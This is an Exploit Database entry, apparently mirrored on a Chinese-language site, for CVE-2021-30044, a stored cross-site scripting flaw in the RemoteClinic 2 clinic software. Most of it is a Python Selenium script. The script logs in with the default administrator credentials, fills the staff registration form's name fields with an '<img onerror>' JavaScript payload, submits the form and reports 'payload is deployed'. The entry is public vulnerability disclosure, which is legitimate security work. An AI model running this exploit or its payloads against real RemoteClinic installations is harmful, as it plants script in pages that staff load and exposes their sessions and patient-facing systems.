RemoteClinic 2 – ‘Multiple’ Cross-Site Scripting (XSS)

• Exploit Database
• 19 阅读

• 作者： nu11secur1ty
  日期： 2021-04-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49781/

• # Exploit Title: RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)
  # Exploit Author: nu11secur1ty
  # Debug: g3ck0dr1v3r
  # Date: 04/21/2021
  # Vendor Homepage: https://remoteclinic.io/
  # Software Link: https://github.com/remoteclinic/RemoteClinic
  # CVE: CVE-2021-30044
  
  [+] Exploit Source:
  https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-30044
  
  [Exploit Program Code]
  
  #!/usr/bin/python3
  # Author: @nu11secur1ty
  # Debug: g3ck0dr1v3r
  # CVE-2021-30044
  
  from selenium import webdriver
  import time
  
  
  #enter the link to the website you want to automate login.
  website_link="http://localhost/RemoteClinic/login/"
  
  #enter your login username
  username="admin@domain.ext"
  
  #enter your login password
  password="remoteclinic"
  
  #enter the element for username input field
  element_for_username="user_id"
  #enter the element for password input field
  element_for_password="password"
  #enter the element for submit button
  element_for_submit="submit"
  
  # Dai brauzura aaa ta eba
  browser = webdriver.Chrome() #uncomment this line,for chrome users
  #browser = webdriver.Firefox() #uncomment this line,for chrome users
  #browser = webdriver.Safari() #for macOS users[for others use chrome vis
  chromedriver]
  
  # Otvarai da ne vlazam s kasata
  browser.get((website_link))
  
  # Run...
  try:
  username_element = browser.find_element_by_name(element_for_username)
  username_element.send_keys(username)
  password_element= browser.find_element_by_name(element_for_password)
  password_element.send_keys(password)
  
  ### Login
  signInButton = browser.find_element_by_name(element_for_submit)
  signInButton.click()
  
  ### Exploit
  element_for_natrutvanie="submit"
  browser.get(("http://localhost/RemoteClinic/staff/register.php"))
  
  ### Inner text...
  browser.execute_script("document.querySelector('[name=\"first_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'")
  browser.execute_script("document.querySelector('[name=\"last_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'")
  browser.execute_script("document.querySelector('[name=\"userid\"]').value = 'nu11secur1ty@gmail.com'")
  browser.execute_script("document.querySelector('[name=\"passkey\"]').value = 'password'")
  browser.execute_script("document.querySelector('[name=\"contact\"]').value = '123456789'")
  browser.execute_script("document.querySelector('[name=\"mobile\"]').value = '12345678910'")
  browser.execute_script("document.querySelector('[name=\"skype\"]').value = 'nu11secur1ty'")
  browser.execute_script("document.querySelector('[name=\"address\"]').value = 'Kurec A 31'")
  browser.find_element_by_name('image').send_keys("C:\\Users\\nu11secur1ty\\Desktop\\CVE\\CVE-2021-30044\\nu11secur1ty.png")
  time.sleep(5)
  
  # Submit exploit
  signInButton = browser.find_element_by_name(element_for_natrutvanie)
  signInButton.click()
  
  # Maani sa i testwai posle
  time.sleep(1)
  browser.get(("http://localhost/RemoteClinic/login/signout.php"))
  browser.close()
  
  
  print("payload is deployed...\n")
  except Exception:
  
  #### This exception occurs if the element are not found in the webpage.
  print("Some error occured :(")